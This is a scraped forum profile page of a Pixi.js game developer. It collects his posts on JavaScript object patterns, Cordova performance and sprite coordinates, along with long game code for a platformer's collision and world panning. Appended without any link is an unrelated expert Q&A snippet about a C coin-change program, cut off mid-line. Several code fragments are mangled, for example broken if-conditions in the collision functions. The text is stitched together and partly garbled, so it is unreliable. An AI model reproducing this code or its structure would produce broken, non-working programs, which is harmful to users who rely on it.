neonwarge04Members Content Count66 Joined Last visited About neonwarge04 - RankAdvanced Member Recent Profile Visitors 839 profile views Kyros2000GameDev reacted to a post in a topic: Is my way of creating objects correct? - Hi BobF, I noticed that as well. I finally settled down using the prototype approach when I deal with objects I planned to create multiple times and modular approach when I deal with classes I don't have to instantiate multiple times. At least, this what makes sense to me. Thanks a lot for the input! - define([], function() { var MyClass = (function() { var x = "Hello World!"; var MyClass = function(){}; MyClass.prototype.sayHello = function() { console.log(x); } MyClass.prototype.setHelloMessage = function(mes) { x = mes; } return MyClass; })(); return { create : function() { return MyClass(); } } }); I finally came up with this approach, going back to basic. I need to conserve memory because it is utmost importance in the project we are working on. I still need to work on the return though but we are working on it. Thank you very much! - Wow, thanks for this BobF. It finally came into my senses that what is prototype for. It means that those function are created each time but if they are a prototype of '{}' means all instance uses one copy those function. Since function is also treated as objects, it can be a problem in terms of RAM. The member variables of the object are then reference by 'this', which I highly avoided as it has convoluted my code from early attempts in javascript. Thanks for the insight.. - neonwarge04 started following How to create a circular cooldown effect? and Is my way of creating objects correct? How to create a circular cooldown effect? neonwarge04 posted a topic in Pixi.jsI am struggling, the only resource I found is this. I have not dealt with the code yet, but concepts on how to deal with it. So the thought I came up with is to create a circle via PIXI.Graphics and make this a mask on another black transparent graphics object. The thing is, I wanted my Circle mask to look like a degrading pie chart overtime. I need to be it like this for some reason not like the one on the link. Basically, what I am asking is this, how can I make a circle, to fan left and to fan right (I don't know if I am using the right term)? I needed to draw a fanning effect so I can create a cooldown effect not just this, but some other cool stuff like a loading indicators something similar to Imgur, regardless the shape of my object of interest. Here is what I came up with: This is fairly easy to do in Pixi.js or any other similar renderer libraries out there. But how can I make my circle to have a pie slice like this and it should grow overtime? so I can make something like this (Not just specifically this by the way): I don't like codes by the way. Just concept. I really can get my head wrap around this thing. I don't even know what its properly called (aside from calling it a circular cooldown effect) which made me even more frustrated. I need help! Thanks! Performance on Android 4.1.2 with Cordova 5.4.1 with Crosswalk 1.4.0 neonwarge04 replied to neonwarge04's topic in Pixi.jsThats the thing, I cannot use Ludei CocoonJS, it is required to stick with Cordova for some reason. - Hi, I am kind of frustrated since I cannot run my app with smooth performance when using a phone running Android 4.1.2. It only gives me 8-11 fps. I am using Cordova-Crosswalk plugin, it works find on higher end phone but this is just a very simple game and yet cannot run on lower-end devices. Can you provide some ideas what else I might be missing here? Thank you! [YES OR NO] Pixi.js + Require.js + PhoneGap neonwarge04 posted a topic in Pixi.jsWould this work? I think I am giving up with this HTML5 JavaScript mobile development. THis is such pain in the a$$ to work with. I am forced to use this anyway. I could have used something else but I can't. Is there a way for me to make this work through phone gap? I've been rejected using Cocoon.js. All I get is smirk faces as Cocoon.js is infected with ebola. I am stuck with PhoneGap. Have you tried pixi.js app to work with PhoneGap? If so, how? Pixi.js with PhoneGap? neonwarge04 posted a topic in Pixi.jsHi I am having difficulty with PhoneGap with Pixi.js. I can't seem to see my renderer.view on the screen? It just show the text "Hello World and Hello Universe" and a whitescreen. This should be basically simple. I tried to modify the files and trim the bloatware scripts that I don't even need. It is working, but I can't see the renderer, my game for that matter. What else I missed? Documentation is not helping me either anyway: <!DOCTYPE html><!-- Copyright (c) 2012-2014" /> <script data-</script> <title>Hello World</title> <style> body{ margin : 0; padding : 0; } #gamediv { width : 100%; height : auto; margin : 0; padding : 0; } </style> </head> <body> <script type="text/javascript" src="cordova.js"></script> <script type="text/javascript" src="js/index.js"></script> <script type="text/javascript"> app.initialize(); </script> <div id="gamediv"> Hello World and Hello Universe!!! </div> </body></html>Please let me know if you need more source files to check out. Thank you! - How can I handle sprite coordinates when the container it belongs to scaled? I am trying to resize my game app base on the size of the screen but the scaling seems to disrupt my toons grid location. This is only occurs when I resize (scale) the game to fit the device screen. What I am trying to do is that I have two containers, MainContainer and SubContainer. MainContainer is what I use generally for common view for example placing some UI parts. The SubContainer is what I use to pan the world around. I have been successful using this setup but it breaks when I scale the screen to fit into the device. For instance I am scaling the MainContainer. Is there a solution for this? How am I suppose to handle this? What I have been thinking is to get how much pixels do the screen scaled to and account for it and apply the difference to every sprite but I am not sure about this. Thanks for your help! - Exca thank you for your reply! Thats another way to put it! Also I was able to figure it out what was wrong. In fact I am doing it wrong, I am checking the limitX/Y via global coordinates of the toon. This is wrong. I realize I only need the global coordinates of the toon, calculate the grid position base on that and retrieve the colliding object from the sensor: (function detectFloorCollision() { mLimit.y = getMostRoof(mGridPosition , 1); // I should be comparing mMovieClip's position inside the subcontainer if((mMovieClip!"); } } }());I realize I am comparing a global coordinate with a coordinate for subcontainer. In fact, in-game it doesn't really matter where the sprites are inside the sub container. This is completely irrelevant. My worry before is computing the y coordinate inside the subcontainer which become increasingly negative as I go up. I can't compute for grid position given this data. Also I replaced the code where it will give me the location of the block sprite in the subcontainer since I am computing for its global position as well. In fact, I don't need the coordinates inside the subcontainer. My only concern is the position of Toon on global container being inside the subcontainer. So here is what it looks like: function getMostRoof(gridPosition , direction) { var gpos = {}; gpos.x = gridPosition.x; gpos.y = gridPosition.y + (1 * direction); var block = mWorld.getBlock(gpos); var point = new PIXI.Point(); if(block !== null) { if(!block.isSolid) return getMostRoof({x : gridPosition.x , y : gridPosition.y + (1 * direction) } , direction); else { var limitY = 0; // same as before, get the position from the subcontainer and return that as limitY if(direction === 1) { mCurrentFloor = block; limitY = mCurrentFloor.y; } else { mCurrentRoof = block; limitY = mCurrentRoof.y + mWorld.blockSize; } return limitY; } } else { /* Date: December 8, 2015 Note: Double check roof and floor bounds when no block detected Perhaps use the (0,0)/(0,n) most block and check collision against it? */ return (direction === 1)? mWorld.pixelHeight : mMovieClip.y - mWorld.pixelHeight; } }There you go! I got my game mechanics working out so far right now. Thanks for your help! - This would fail actually. My mainContainer doesn't have a parent. If I run it this way, it will throw an exception. - This is very helpful tips! Thank you! But I kinda give up, this is hopeless, I can't get it to work. If pixi have something like that of SFML like mapping pixel to coordinate, I can simply treat my sprite like a mouse or something. I mean ideally, I don't have to handle sprite getting 'off the screen' this is stupid specially in games meant for mobile right? So I have to keep the coordinates of the sprite constant. I am force to use two containers instead and pan just the second one. Now I am having hard time making sure my toon's coordinate where jumping back and forth. Here is what I am currently doing, maybe you can help me with this? I am animating the pan, so every time toon reaches a height of gridPosition.y >= 6, the entire world collapses and then pan upwards. As I pan upwards (which means I pull the second container downwards pulling everything on it downwards) this causing disruption to my collision detection. If only I could get the correct coordinates of the sprite in the visible screen, this could have been possible. Here is the real mess I am dealing with: Toon.js define(['pixi' , 'core/utils/Keyboard', 'tween'], function(PIXI , Keyboard, TWEEN){ function Toon(world) { var mIsJumping = false; var mIsOnGround = true; var mGlobalContainer = world.globalContainer; var mContainer = world.container; var mPanHeight = 6; var mJumpSpeed = 640; var mMoveSpeed = 250 ; var mWorld = world; var mDirection = 1; var mVelocity = { x : mMoveSpeed , y : 0 }; var mGridPosition = { x : 0 , y : 0 }; var mPosition = { x : 0 , y : 0 }; var mSize = { width : 40 , height : 40 }; var mLimit = { x : 0 , y : 0 }; var mCurrentFloor = null; var mGravity = 28.8; var mIsDead = false; var mWallStickEnabled = false; var mIsWallSticking = false; var mIsTouchingLeftMostWall = false; var mIsTouchingRightMostWall = false; var mIsPannable = true; var mHighestHeightAttained = 0; var mCurrentBlocks = {}; var mCurrentLeftWall = null; var mCurrentRightWall = null; var mCurrentFloor = null; var mCurrentRoof = null; var mJumpKey = Keyboard(32); mJumpKey.press = function() { jump(); } var mMovieClip = new PIXI.extras.MovieClip(this.mAnimFrames); mMovieClip.animationSpeed = 0.3; mMovieClip.anchor.x = 0.5; mMovieClip.anchor.y = 0.5; mMovieClip.play(); mMovieClip.x = mPosition.x; mMovieClip.y = mPosition.y; mMovieClip.play(); var This = { get position(){ return mMovieClip.position; } , set position(position) { mMovieClip.position = position } , get x(){ return mMovieClip.x; } , get y(){ return mMovieClip.y; } , set x(x){ return mMovieClip.x = x; } , set y(y){ return mMovieClip.y = y; } , get global() { var point = new PIXI.Point(); point = mMovieClip.toGlobal(point); point.x += mGlobalContainer.x; point.y += mGlobalContainer.y; return point; } , get size(){ return mSize; } , get width(){ return mSize.width; } , get height(){ return mSize.height; } , update : update , jump : jump , get sprite() { return mMovieClip; } , get highestHeightAttained(){ return mHighestHeightAttained; } }; function update(elapsed) { TWEEN.update(elapsed); if(mIsPannable) { if(!mIsWallSticking) mVelocity.y += mGravity; else mVelocity.y = 60; mMovieClip.x += (mVelocity.x * elapsed) * mDirection; mMovieClip.y += mVelocity.y * elapsed; mGridPosition.x = Math.floor(This.global.x / mWorld.blockSize); mGridPosition.y = Math.floor(This.global.y / mWorld.blockSize); // console.log("Grid position : " + mGridPosition.x + ' x ' + mGridPosition.y); detectCollision(); } } function detectCollision() { (function detectFloorCollision() { mLimit.y = getMostRoof(mGridPosition , 1); if((This.global!"); } } }()); (function detectRoofCollision() { mLimit.y = getMostRoof(mGridPosition, -1); if((This.global.y - (mSize.height / 2)) <= mLimit.y) { mMovieClip.y = mLimit.y + (mSize.width / 2); mVelocity.y = 0.0; } }()); (function detectLeftWallCollision() { mLimit.x = getMostWall(mGridPosition , -1); if(This.global.x - (mSize.width / 2) <= (mLimit.x + mWorld.blockSize)) { mMovieClip.x = mLimit.x + mWorld.blockSize + (mSize.width / 2); mMovieClip.scale.x = 1; // check if jumping when on the edge of the wall if(mIsJumping && mVelocity.y > 0) { mVelocity.y = 0.0; mIsWallSticking = true; mIsJumping = false; mIsTouchingLeftMostWall = true; } } else { if(!mIsTouchingRightMostWall) mIsWallSticking = false; mIsTouchingLeftMostWall = false; } })(); (function detectMostRightWallCollision() { mLimit.x = getMostWall(mGridPosition , 1); if(This.global.x + (mSize.width / 2) >= mLimit.x) { mMovieClip.x = mLimit.x - (mSize.width / 2); mMovieClip.scale.x = -1; // check if jumping when on the edge of the wall if(mIsJumping && mVelocity.y > 0) { mVelocity.y = 0.0; mIsWallSticking = true; mIsJumping = false; mIsTouchingRightMostWall = true; } } else { if(!mIsTouchingLeftMostWall) mIsWallSticking = false; mIsTouchingRightMostWall = false; } })(); } function getMostWall(gridPosition , direction) { var gpos = {}; gpos.x = gridPosition.x + (1 * direction); gpos.y = gridPosition.y; var block = mWorld.getBlock(gpos); if(block !== null) { if(!block.isSolid) return getMostWall({x : gridPosition.x + (1 * direction) , y : gridPosition.y} , direction); else { var limitX = 0; var point = new PIXI.Point(); if(direction === 1) { mCurrentRightWall = block; point = mCurrentRightWall.getGlobalPosition(point); point.x += mGlobalContainer.x; point.y += mGlobalContainer.y; limitX = point.x; } else { mCurrentLeftWall = block; point = mCurrentLeftWall.getGlobalPosition(point); point.x += mGlobalContainer.x; point.y += mGlobalContainer.y; limitX = point.x; } return limitX; } } else { return (direction === 1)? mWorld.pixelWidth : -mWorld.blockSize; } } function getMostRoof(gridPosition , direction) { var gpos = {}; gpos.x = gridPosition.x; gpos.y = gridPosition.y + (1 * direction); var block = mWorld.getBlock(gpos); if(block !== null) { if(!block.isSolid) return getMostRoof({x : gridPosition.x , y : gridPosition.y + (1 * direction) } , direction); else { var limitY = 0; var point = new PIXI.Point(); if(direction === 1) { mCurrentFloor = block; point = mCurrentFloor.getGlobalPosition(point); point.x += mGlobalContainer.x; point.y += mGlobalContainer.y; limitY = point.y; } else { mCurrentRoof = block; point = mCurrentRoof.getGlobalPosition(point); point.x += mGlobalContainer.x; point.y += mGlobalContainer.y; limitY = point.y + mWorld.blockSize; } return limitY; } } else { return (direction === 1)? mWorld.pixelHeight : 0; } } function jump() { if(mIsWallSticking) { mDirection = mDirection * -1; mVelocity.y = -mJumpSpeed; mIsJumping = true; mIsOnGround = false; mIsWallSticking = false; } else if(mIsOnGround) { mIsJumping = true; mIsOnGround = false; mVelocity.y = -mJumpSpeed; } } mWorld.onPanFinished = function() { mIsPannable = true; mMovieClip.y -= mPanHeight * mWorld.blockSize; } mMovieClip.x = (mWorld.startingBlock.x + (mWorld.blockSize / 2)); mMovieClip.y = (mWorld.startingBlock.y + (mWorld.blockSize / 2)) + (mSize.height / 2); mHighestHeightAttained = Math.floor(mMovieClip.y / mWorld.blockSize); return This; } return { create : function(stage , screenSize) { return Toon(stage , screenSize); } };});World.js define(['tween', 'src/Segment', 'src/Block'] , function(TWEEN, Segment, Block){ function World(stage, globalContainer, screenSize) { var mScreenSize = screenSize; var mStage = stage; var mGlobalContainer = globalContainer; var mBlockSize = 82; var mSize = {width : 0 , height : 0}; var mLevelSegmentsLookup = []; var mBlockPool = []; var mVoidPool = []; var mOpenedDoorPool = []; var mClosedDoorPool = []; var mQueueArea = [] var mPlayArea = []; var mPlayAreaHolder = []; var mLevels = []; var mOnPanFinished = function(){}; var mStartingBlock = null; var This = { init : init , get blockSize(){ return mBlockSize; } , get startingBlock(){ return mStartingBlock; } , getBlock : getBlock , borrowBlock : borrowBlock , returnBlock : returnBlock , update : update , collapse : collapse , get size(){ return mSize; } , get width(){ return mSize.width; } , get height(){ return mSize.height; } , get pixelWidth(){ return mSize.width * mBlockSize; } , get pixelHeight(){ return mSize.height * mBlockSize; } , get globalContainer(){ return mGlobalContainer; } , get container(){ return mStage; } , get onPanFinished(){ return mOnPanFinished; } , set onPanFinished(callback){ mOnPanFinished = callback; } }; ... function removeSegmentFromBottom(count) { for(var i = 0; i < count; ++i) { var part = mPlayArea.pop(); for(var x = 0; x < part.length; ++x) { var block = part[x]; block.invalidate(mStage); returnBlock(block); } } mSize.height = mPlayArea.length; mSize.width = mPlayArea[0].length; } function addSegmentToTop(count) { var previousHeight = mPlayArea[0][0].y; for(var y = 0; y < count; y++) { if(mQueueArea.length === 0) { var randomQueuedLevel = randomWithinRange(0, mLevels.length - 1); var additionalLevel = makeLevel(mLevels[randomQueuedLevel].slice() , false).data; mQueueArea = mQueueArea.concat(additionalLevel); } var newPart = mQueueArea.pop(); for(var x = 0; x < newPart.length; ++x) { var block = newPart[x]; if(block.sprite !== null) { block.x = x * mBlockSize; block.y = ((y + 1) * -mBlockSize) + previousHeight; block.gx = x; block.gy = y; mStage.addChild(block.sprite); } } mPlayArea.unshift(newPart); } refreshGridPositions(); mSize.height = mPlayArea.length; mSize.width = mPlayArea[0].length; } function refreshGridPositions() { for(var y = 0; y < mPlayArea.length; ++y) { for(var x = 0; x < mPlayArea[y].length; ++x) { var block = mPlayArea[y][x]; block.gx = x; block.gy = y; } } } function update(elapsed) { TWEEN.update(); // mStage.position.y += elapsed * 60; } function collapse(times) { addSegmentToTop(times); // mStage.position.y += times * mBlockSize; // removeSegmentFromBottom(times); // if(mOnPanFinished) mOnPanFinished(); var positionY = mStage.position.y; new TWEEN.Tween({y : 0}) .to({y : times * mBlockSize}, 5000) .onUpdate(function() { mStage.position.y = positionY + this.y; console.log("Updating... panning..."); }) .onComplete(function() { //console.log("Panning finished"); if(mOnPanFinished) mOnPanFinished(); removeSegmentFromBottom(times); //console.log("Size of play area should be constant : " + mPlayArea.length); //console.log("Number of sprite should be constant : " + mStage.children.length); }) .start(); } function getBlock(gridPosition) { if((gridPosition.x >= 0 && gridPosition.x < mSize.width) && (gridPosition.y >= 0 && gridPosition.y < mSize.height)) { var block = mPlayArea[gridPosition.y][gridPosition.x]; return (block === undefined)? null : block; } return null; } function randomWithinRange(min , max) { return Math.floor(Math.random() * (max - min + 1)) + min; } return This; } return { create : function(stage, screenSize, viewPort) { return World(stage, screenSize, viewPort); } };});Block.js define(['pixi'] , function(PIXI){ var Type = { None : 0 , Block1x1 : 1 , Start : 8 }; function Block(type, size) { var mType = type; var mSize = size; var mIsSolid = false; var mIsStartingPosition = false; var mIsEndingPosition = false; var mBlockSize = size; var mGridPosition = {x : 0 , y : 0}; var mPosition = {x : 0 , y : 0}; var mSprite = getSpriteFromFrame(type); var Class = { get sprite(){ return mSprite; } , get position(){ return mSprite.position; } , set position(position){ mSprite.position = position; } , get x(){ return mPosition.x; } , set x(x){ mPosition.x = x; if(mSprite !== null) mSprite.x = x; } , get y(){ return mPosition.y; } , set y(y){ mPosition.y = y; if(mSprite !== null) mSprite.y = y; } , get isSolid(){ return mIsSolid; } , get type(){ return mType; } , get startingPosition(){ return mIsStartingPosition; } , get endingPosition(){ return mIsEndingPosition; } , get gridPosition(){ return mGridPosition; } , set gridPosition(gridPosition){ mGridPosition = gridPosition; } , get gx(){ return mGridPosition.x; } , get gy(){ return mGridPosition.y; } , set gx(x){ mGridPosition.x = x; } , set gy(y){ mGridPosition.y = y; } , get size(){ return mSize; } , getGlobalPosition : getGlobalPosition , invalidate : invalidate }; function getGlobalPosition(point) { // remove the debug tile afterwards return mSprite.toGlobal(point); } function getSpriteFromFrame(type) { var sprite = null; switch(type) { case Type.None: sprite = PIXI.Sprite.fromFrame('sample_tilebg.png'); mIsSolid = false; break; case Type.Block1x1: sprite = PIXI.Sprite.fromFrame('sample_block.png'); mIsSolid = true; break; case Type.Start: sprite = PIXI.Sprite.fromFrame('sample_door.png'); mIsStartingPosition = true; mIsSolid = false; break; default: sprite = null; mIsSolid = false; console.log("Could not identify block type : " + type); break; } return sprite; } function invalidate(stage) { if(stage) stage.removeChild(mSprite); } return Class; } return{ Type : Type , create : function(type, size) { return Block(type , size); } };});I am gonna be so dead tomorrow - Oh no, I think I still got it wrong. I am frustrated, I wanted to get the coordinates of my sprite against the container I created, the one which doesn't pan upwards. toGlobal is returning me wrong values. Which, through in depth debugging, understood the reason for this. So I am the one whose wrong. Here is what I need: I have two containers (maincontainer for main view and for ui) second is (subcontainer) this is what I use to pan everything in the game. I inserted a sprite inside subcontainer and I move that container around, I still need to get the position of the sprite when I view it from maincontainer. Imagine the sprite is at (45,45), because I pan the subcontainer 45 pixels to right and 45 pixels downwards but inside subcontainer sprites coordinate is still 0x0. This is correct, but when I use the maincontainer as a reference it perceives the coordinate as 45x45. Is there a way for me to do this? If so how? - I think I got it now! I lack understanding between local vs global coordinates. I used global and it looks pretty well so far, and this is the data I exactly need for the game! <!DOCTYPE html><html> <head> <title>Screen Panning Sample</title> <script src="core/pixi.js"></script> </head> <body> <script> var screenSize = {width : 800 , height : 600 }; var renderer = PIXI.autoDetectRenderer(screenSize.width, screenSize.height, {}); var sprite = null; var subStage = new PIXI.Container(); var stage = new PIXI.Container(); stage.addChild(subStage); new PIXI.loaders.Loader() .add('res/textures/textures.json') .once('complete' , function() { sprite = new PIXI.Sprite.fromFrame('0.png'); sprite.anchor.x = 0.5; sprite.anchor.y = 0.5; sprite.position.x = screenSize.width / 2; sprite.position.y = screenSize.height / 2; subStage.addChild(sprite); update(); }) .load(); function update() { renderer.render(stage); subStage.position.y += 0.016667 * 20; sprite.x += 0.016667 * 20; var glb = sprite.toGlobal(stage.position); var act = sprite.position; console.log("global coords : " + glb.x + ' ' + glb.y); console.log("actual coords : " + act.x + ' ' + act.y); requestAnimationFrame(update); } document.body.appendChild(renderer.view); </script> </body></html>Thank you!!!
https://www.html5gamedevs.com/profile/15920-neonwarge04/
CC-MAIN-2020-24
refinedweb
3,455
53.17
IOC - A lightweight IOC (Inversion of Control) framework use IOC;(); This module provide a lightweight IOC or Inversion of Control framework. Inversion of Control, sometimes called Dependency Injection, is a component management style which aims to clean up component configuration and provide a cleaner, more flexible means of configuring a large application. My favorite 10 second description of Inversion of Control is, "Inversion of Control is the inverse of Garbage Collection". This comes from Howard Lewis Ship, the creator of the HiveMind IoC Java framework. His point is that the way garbage collection takes care of the destruction of your objects, Inversion of Control takes care of the creation of your objects. However, this does not really explain why IoC is useful, for that you will have to read on. You may be familiar with a similar style of component management called a Service Locator, in which a global Service Locator object holds instances of components which can be retrieved by key. The common style is to create and configure each component instance and add it into the Service Locator. The main drawback to this approach is the aligning of the dependencies of each component prior to inserting the component into the Service Locator. If your dependency requirements change, then your initialization code must change to accommodate. This can get quite complex when you need to re-arrange initialization ordering and such. The Inversion of Control style alleviates this problem by taking a different approach. With Inversion of Control, you configure a set of individual Service objects, which know how to initialize their particular components. If these components have dependencies, the will resolve them through the IOC framework itself. This results in a loosely coupled configuration which places no expectation upon initialization order. If your dependency requirements change, you need only adjust your Service's initialization routine, the ordering will adapt on it's own. For links to how other people have explained Inversion of Control, see the "SEE ALSO" section. Inversion of Control is not for everyone and really is most useful in larger applications. But if you are still wondering if this is for you, then here are a few questions you can ask yourself. If so, you are a likely candidate for IOC. Singletons can be very useful tools, but when they are overused, they quickly start to take on all the same problems of global variables that they were meant to solve. With the IOC framework, you can reduce several singletons down to one, the IOC::Registry singleton, and allow for more fine grained control over their life-cycles. One of the great parts about IOC is that all initialization of dependencies will get resolved through the IOC framework itself. This allows your application to dynamically reconfigure it load order without you having to recode anything but the actual dependency change. My whole reasoning for creating this module was that I was using a Service Locator object from which I dispensed all my components. This created a lot of delicate initialization code which would frequently be caused issues, and since the Service Locator was initialized after all the services were, it was necessary to resolve dependencies between components manually. The authors of the PicoContainer IoC framework defined 3 types of Dependency Injection; Constructor Injection, Setter Injection and Interface Injection. This framework provides the the ability to do all three types within the default classes using a pseudo-type, which I call Block Injection (for lack of a better term). This framework allows a service to be defined by an anonymous subroutine, which gives a large degree of flexibility. However, we also directly support both constructor injection and setter injection as well. Interface injection support is on the to-do list, but I feel that interface injection is better suited to more 'type-strict' languages like Java or C# and is really not appropriate to perl. There are a number of benefits and drawbacks to each approach, I will now attempt to list them. Constructor injection tends to encourages what are called Good Citizen Objects, which are objects who are fully initialized once they are constructed. It is also easy to analyze dependency relationships since the components are stored in the constructor parameters. One drawback to this approach is that it requires the component to be a class, as well as requires the class to be a Good Citizen. Which is okay if you are writing the class, but maybe not when it is a 3rd party class. Setter injection has its benefits as well. Since all object initialization is done through setter methods, it allows for a cleaner object design when there are a lot of dependencies. Where in a constructor injection, it would cause an explosion of parameters in the constructor. Setter injection dependencies can also be easily analyzed programmatically, since the dependencies are stored in the setter parameters. However, as with constructor injection, some of the the benefits can also be drawbacks. Sometimes having public setters for initialization is not what you would want normally in your class. This style is, in my opinion the most perl-ish approach. It is also, arguably, the simplest approach since it requires very little on the part of the component class, and easily allows for non-object services. It can be used to mix both constructor and setter injection in the same service object. One major drawback is that since the initialization is "hidden" within the anonymous subroutine, it is very difficult to programatically analyze the dependency relationships. To give credit where credit is due, this style is not my own invention, but instead was derived from an IoC Ruby implementation in the article mentioned in the "SEE ALSO" section. Yes, I have been using this actively in production for a couple years now, and it has worked without issue. This section will provide a short description of each of the classes in the framework and how they fit within the framework. For more information about each class, please go to the individual classes documentation. This package mostly serves as a namespace placeholder and to load the base framework. This will load IOC::Registry, IOC::Container and IOC::Service. This is a singleton registry which can be used to store and search IOC::Container objects/hierarchies. This package can be used alone or as a base class and be used to proxy service instances. This IOC::Proxy subclass which proxies an object, but only implements a specified interface. This module allows you to configure an IOC::Registry object using XML. Containers classes can hold references to both IOC::Service objects as well as other IOC::Containers. Containers are central to the framework as they provide the means of managing, storing and retrieving IOC::Service objects. This is the base Container object. In most cases, this class will be all you need. This is a subclass of IOC::Container, and adds the ability to retrieve services and sub-containers with a method call syntax, instead of passing a string key to a retrieval method. Service classes are the even more central to the framework since they are what hold and dispense the dependency objects. There are a number of types of service class, all of which are derived at some point from the base IOC::Service class. This is the base Service object. In most cases, this class will be all you need. This extends the IOC::Service object to allow for a constructor injection style. This extends the IOC::Service object to allow for a setter injection style. This extends the IOC::Service object to allow for additional parameters to be passed during service creation. Since there is an unbound parameter, these services will work like the prototyped services and return a new instance each time. Most services are singletons, meaning there is only one instance of each service in the system. However, sometimes this is not what you would want, and sometimes you want to set up a prototypical instance of a component and get a new instance each time. This set of Service classes provide just such functionality. NOTE: This is not really the same as prototype-based OO programming, we do not actually create a prototypical instance, but instead we just call the creation routine each time the component is requested. A basic prototype-style Service class. This extends the IOC::Service::Prototype object to allow for a constructor injection style. This extends the IOC::Service::Prototype object to allow for a setter injection style. IOC::Visitor classes are used by other classes in the system to perform various search and traversal functions over a IOC::Container hierarchy. They are mostly for internal use. Given a path, this will attempt to locate a service within a IOC::Container hierarchy. Given a service name, this will attempt to locate a service within a IOC::Container hierarchy by doing a depth first pre-order search. Given a container name, this will attempt to locate a service within a IOC::Container hierarchy by doing a depth first pre-order search. These classes are really just support classes for the framework. Defines a number of exceptions (with Class::Throwable) used in the system. Defines a number of interfaces (with Class::Interfaces) used in the system. Cyclical dependencies now work correctly (for the most part, there are still ways to produce infinite recursion, but most of them could be considered programmer error) but should still be considered an experimental feature. This will need to be documented in more detail to explain the gotchas and edge cases. Currently proxys and cyclical dependencies are not working together. In order to resolve the cyclical dependency issue I need to create a IOC::Service::Deferred instance to defer the service creation with. A proxy should not wrap the deferred instance, but should only wrap the final created instance. Currently this does not happen, so I need to work on it. The docs are still very rough in many places and I will be filling in details as I go. Of course any suggestions or criticisms of the docs are very welcome and will be gladly received. Help writing them will also be gladly received as well. I have plenty of unit tests, and the code is pretty well covered (see "CODE COVERAGE" below). However, what is lacking is some more complex integration tests to really test how all the modules work together. I expect a few such tests to come out my using the module in my projects, and I will include them when they do. And of course, I am always open to contributions. If you are just experimenting with this module to see if it would work for you, chances are you will create some code which would be great as an integration test. Please before you throw it away, send it to me, I might be able to use it. These are things which I have in the back of my head and would someday like to create, but just don't have the time right now. I would like to create some kind of Visitor object which would traverse a IOC::Container hierarchy and analyze the dependencies in it. This is somewhat simple for the ::ConstructorInjection and ::SetterInjection Services since they store the keys to their dependencies inside the object. However it is more complex with regular IOC::Service objects which utilize the Block Injection pseudo-type. For those the initialization block would need to probably be run through B::Deparse and the dependency code parsed out. I hacked out a quick script which created a GraphViz .dot file which visualized the dependency tree. It left much to be desired, but it served as a proof of concept. I would like to expand that idea into a more useful and flexible tool. If anyone is interested in doing this one, contact me and I will send you the proof of concept script. --------------------------------------------- ------ ------ ------ ------ ------ ------ ------ IOC.pm 100.0 n/a n/a 100.0 n/a 1.4 100.0 IOC/Exceptions.pm 100.0 n/a n/a 100.0 n/a 7.6 100.0 IOC/Interfaces.pm 100.0 n/a n/a 100.0 n/a 2.5 100.0 IOC/Registry.pm 100.0 97.6 66.7 100.0 100.0 12.3 97.4 IOC/Config/XML.pm 100.0 100.0 66.7 100.0 100.0 6.1 96.0 IOC/Config/XML/SAX/Handler.pm 100.0 92.0 70.0 100.0 100.0 16.7 94.2 IOC/Proxy.pm 100.0 92.3 60.0 100.0 100.0 3.2 97.4 IOC/Proxy/Interfaces.pm 100.0 100.0 n/a 100.0 n/a 0.7 100.0 IOC/Container.pm 100.0 98.3 91.3 100.0 100.0 23.0 98.9 IOC/Container/MethodResolution.pm 100.0 100.0 n/a 100.0 n/a 5.6 100.0 IOC/Service.pm 89.4 78.6 66.7 88.5 100.0 7.0 85.7 IOC/Service/Literal.pm 100.0 100.0 33.3 100.0 100.0 0.7 96.2 IOC/Service/Prototype.pm 100.0 100.0 n/a 100.0 100.0 5.8 100.0 IOC/Service/ConstructorInjection.pm 100.0 100.0 66.7 100.0 100.0 2.2 93.9 IOC/Service/SetterInjection.pm 100.0 100.0 66.7 100.0 100.0 1.5 94.3 IOC/Service/Prototype/ConstructorInjection.pm 100.0 n/a n/a 100.0 n/a 0.5 100.0 IOC/Service/Prototype/SetterInjection.pm 100.0 n/a n/a 100.0 n/a 0.3 100.0 IOC/Visitor/SearchForContainer.pm 100.0 100.0 66.7 100.0 100.0 0.5 96.6 IOC/Visitor/SearchForService.pm 100.0 100.0 66.7 100.0 100.0 0.6 96.8 IOC/Visitor/ServiceLocator.pm 100.0 100.0 66.7 100.0 100.0 1.8 97.3 --------------------------------------------- ------ ------ ------ ------ ------ ------ ------ Total 99.1 94.8 70.3 98.7 100.0 100.0 95.9 --------------------------------------------- ------ ------ ------ ------ ------ ------ ------ Inversion of Control (or Dependency Injection) is one of the current hot buzzwords in the Java/Design patterns/C# community right now. However, just because a lot of people are talking about it insufferably does not mean it is still not a good idea. Below some links I have collected regarding IoC which you might find useful. Here is a list of some Java IoC frameworks. Spring also has a .NET version as well. Here is a list of Ruby IoC Frameworks I have only skimmed this site, but it seems that Copland is inspired by HiveMind. I have only skimmed this site, but it seems that Needle is a lightweight version of Copland. Rico is a Ruby port of the Java Pico Framework. stevan little, <stevan@iinteractive.com> This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
http://search.cpan.org/~stevan/IOC/lib/IOC.pm
CC-MAIN-2017-26
refinedweb
2,513
54.63
Programming Programming Questions? Ask a Programmer for Answers ASAP Hello Please confirm if you still need assistance with this Yes, I still need help with this. The website was having problems when I tried to submit it this morning. Hello? Sorry for that.. i will have this ready soon I have some code that mostly works. #include <stdio.h> int change(float total, int *quarters, int *dimes, int *nickels, int *pennies); void print(float total, int quarters, int dimes, int nickels, int pennies); int main(void) { int quarters, dimes, nickels, pennies; float total; printf("This program will give the coins required for two fixed values, and one user input value.\n"); total = 1.88; change(total, &quarters, &dimes, &nickels, &pennies); //for the first call to change, calculates for defined value of 1.88 print(total, quarters, dimes, nickels, pennies); total = 0.32; change(total, &quarters, &dimes, &nickels, &pennies); //for the second call, calculates for defined value of 0.32 printf("\nPlease enter an amount of money: "); //This gets the users input for the amount to make change for. scanf("%f", &total); change(total, &quarters, &dimes, &nickels, &pennies); //calls the function change() to calculate for the user input print(total, quarters, dimes, nickels, pennies); //prints the user input values for change fflush(stdin); /* clear input area so you can pause */ printf("Press the key to exit program."); getchar(); /* force the computer to pause until you press a key on the keyboard */ return 0; } int change(float total, int *quarters, int *dimes, int *nickels, int *pennies) //declares the variables for the change function if( total >= 0.25 ) *quarters = (total / 0.25); //calculates the amount of quarters, and stores it into quarters if( total >= 0.10 ) *dimes = (total - (*quarters * 0.25)) / 0.10; //calculates the amount of dimes, and stores it into dimes if( total >= 0.05 ) *nickels = (total - (*quarters * 0.25) - (*dimes * 0.10)) / 0.05; //calculates the amount of nickels, and stores it into nickels if( total >= 0.01 ) *pennies = (total - (*quarters * 0.25) 